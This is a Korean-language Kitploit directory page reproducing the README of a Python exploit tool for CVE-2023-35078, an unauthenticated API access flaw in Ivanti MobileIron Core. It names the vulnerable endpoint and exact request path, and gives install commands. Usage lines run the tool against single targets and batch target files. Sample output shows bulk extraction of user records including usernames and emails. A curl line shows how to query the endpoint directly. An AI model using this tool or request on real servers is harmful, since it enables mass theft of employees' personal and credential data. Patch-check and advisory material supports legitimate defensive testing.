Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-35078 — CVE-2023-35078 - Ivanti MobileIron Core 원격 인증되지 않은 API 접근 익스플로잇 도구 | Kitploit
도구/GitHubGitHub/0nsec/cve-2023-35078
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHub0nsec/cve-2023-35078

CVE-2023-35078

CVE-2023-35078 - Ivanti MobileIron Core 원격 인증되지 않은 API 접근 익스플로잇 도구

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-35078 익스플로잇 도구

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[+] CVE-2023-35078 - Ivanti MobileIron Core 원격 인증되지 않은 API 접근

Python Version License CVSS Last Updated

Ivanti MobileIron Core 시스템의 원격 인증되지 않은 API 접근 취약점을 대상으로 한 CVE-2023-35078에 대한 Python 기반 개념 증명 익스플로잇입니다.

취약점 개요

CVE-2023-35078는 Ivanti MobileIron Core에 영향을 미치는 치명적인 취약점으로, 원격의 인증되지 않은 공격자가 인증 없이 중요한 API 엔드포인트에 접근하고 사용자 데이터를 추출할 수 있습니다.

  • CVSS 점수: 9.8 (치명적)
  • CWE: CWE-306 (중요 기능에 대한 인증 누락)
  • 영향받는 제품: Ivanti MobileIron Core
  • 취약한 버전:
    • 11.2 (11.2 CU21 이전)
    • 11.3 (11.3 CU18 이전)
    • 11.4 (11.4 CU8 이전)
  • 공격 벡터: 네트워크
  • 인증: 필요 없음
  • 사용자 상호작용: 필요 없음
  • 영향: 완전한 사용자 데이터 노출

기술 세부 사항

취약점은 MobileIron Core의 API 인증 메커니즘, 특히 /mifs/aad/api/v2/authorized/users 엔드포인트에 존재합니다. 이 엔드포인트는 인증 토큰을 제대로 검증하지 못하여, 승인되지 않은 접근이 다음을 포함한 중요한 사용자 정보에 접근할 수 있게 합니다:

  • 사용자 자격 증명: 사용자 이름, 비밀번호 해시
  • 개인 데이터: 전체 이름, 이메일 주소, 전화번호
  • 회사 데이터: 직원 ID, 부서 정보
  • 장치 정보: 등록된 장치, 장치 구성
  • 관리 데이터: 사용자 역할, 권한, 그룹 구성원

설치

전제 조건

  • Python: 3.6 이상
  • 운영 체제: Linux, macOS, Windows
  • 네트워크 접근: 대상 테스트에 필요
  • 권한: 시스템 소유자의 승인

빠른 설치

root@kitploit:~
# 저장소 복제
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit

# 의존성 설치
pip3 install -r requirements.txt

# 실행 권한 부여 (Linux/macOS)
chmod +x cve_2023_35078.py

수동 설치

root@kitploit:~
# 프로젝트 디렉터리 생성
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit

# 스크립트 다운로드
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py

# 필요한 패키지 설치
pip3 install requests urllib3 termcolor argparse

Docker 설치 (선택 사항)

root@kitploit:~
FROM python:3.9-slim

WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt

COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
root@kitploit:~
# Docker로 빌드 및 실행
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com

사용법

기본 사용법

root@kitploit:~
# 단일 대상 테스트
python3 cve_2023_35078.py -u https://mobileiron.example.com

# 파일에서 여러 대상 테스트
python3 cve_2023_35078.py -f targets.txt

# 상세 모드 및 사용자 정의 출력 디렉터리
python3 cve_2023_35078.py -f targets.txt -o ./results -v

# 사용자 정의 타임아웃 및 출력 설정
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v

고급 사용 예제

root@kitploit:~
# 포괄적인 기업 평가
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v

# 상세 로깅이 포함된 단일 대상
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt

# 사용자 정의 타임아웃으로 배치 스캔
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results

# 빠른 취약점 확인 (상세 출력 없음)
python3 cve_2023_35078.py -u https://quick.check.com -t 5

출력

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[*] Target: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] Checking version for: https://vulnerable.mobileiron.com
[*] Detected version: 11.3
[+] Target appears VULNERABLE!
[*] Attempting to exploit: https://vulnerable.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] SUCCESS! Found 1,247 users
[+] Results saved to: ./results/vulnerable_mobileiron_com_20250821_055013.json
[+] Extracted 1247 user records
[*] Sample fields: ['id', 'username', 'email', 'firstName', 'lastName']...

============================================================
[*] Scan completed!
[*] Targets processed: 1
[*] Successful exploits: 1
[!] WARNING: 1 vulnerable system(s) found!
[!] Ensure proper authorization before testing!

상세 출력

root@kitploit:~
[*] Checking version for: https://test.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - Response length: 45,123 bytes
[*] JSON parsing successful
[*] Found user data structure with 234 records
[+] SUCCESS! Found 234 users
[*] Sample user data: {'id': '12345', 'username': '[email protected]'}
[+] Results saved to: ./results/test_mobileiron_com_20250821_055013.json

성능 최적화

  • 연결 풀링: HTTP 연결 재사용
  • 동시 요청: 여러 대상에 대한 병렬 처리
  • 스마트 타임아웃: 응답 시간에 기반한 적응형 타임아웃
  • 메모리 관리: 대규모 데이터 세트의 효율적 처리
  • 속도 제한: 대상에 과부하를 방지하기 위한 내장 지연

공급업체 패치 정보

패치 확인

root@kitploit:~
# 현재 버전 확인
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"

# 패치된 엔드포인트가 401/403을 반환하는지 확인
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"

참고 자료 및 리소스

공식 보안 권고

  • NVD - CVE-2023-35078
  • Ivanti 보안 권고
  • CISA 알려진 악용 취약점

기술 문서

  • Ivanti MobileIron Core 관리자 가이드
  • API 문서
  • 보안 강화 가이드

연구 논문 및 분석

  • 상세 기술 분석
  • 익스플로잇 기법
  • 위협 인텔리전스 보고서
도구 다운로드
버전취약 여부패치 가능 여부패치 수준출시 날짜
11.2.x예가능CU21+2023-07-25
11.3.x예가능CU18+2023-07-25
11.4.x예가능CU8+2023-07-25
11.5.x+아니오해당 없음해당 없음해당 없음